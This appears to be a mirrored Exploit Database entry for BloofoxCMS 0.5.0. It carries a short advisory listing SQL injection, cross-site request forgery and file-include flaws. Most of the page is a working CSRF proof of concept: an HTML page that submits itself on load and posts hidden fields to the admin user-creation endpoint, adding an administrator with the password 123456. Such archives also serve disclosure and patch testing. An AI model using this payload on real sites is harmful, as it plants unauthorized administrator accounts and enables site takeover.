BloofoxCMS – ‘/admin/index.php’ Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 11 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2014-01-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39031/

• source: https://www.securityfocus.com/bid/65019/info
  
  bloofoxCMS is prone to the following security vulnerabilities:
  
  1. Multiple SQL-injection vulnerabilities
  2. Multiple cross-site request forgery vulnerabilities
  3. A local file-include vulnerability
  
  Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
  
  bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
  
  [Add Admin]
  
  <html>
  <body onload="document.form0.submit();">
  <form method="POST" name="form0" action="
  http://localhost/admin/index.php?mode=user&action=new">
  <input type="hidden" name="username" value="Admin"/>
  <input type="hidden" name="password" value="123456"/>
  <input type="hidden" name="pwdconfirm" value="123456"/>
  <input type="hidden" name="3" value="Admin"/>
  <input type="hidden" name="blocked" value="0"/>
  <input type="hidden" name="deleted" value="0"/>
  <input type="hidden" name="status" value="1"/>
  <input type="hidden" name="login_page" value="0"/>
  <input type="hidden" name="send" value="Add User"/>
  </form>
  </body>
  </html>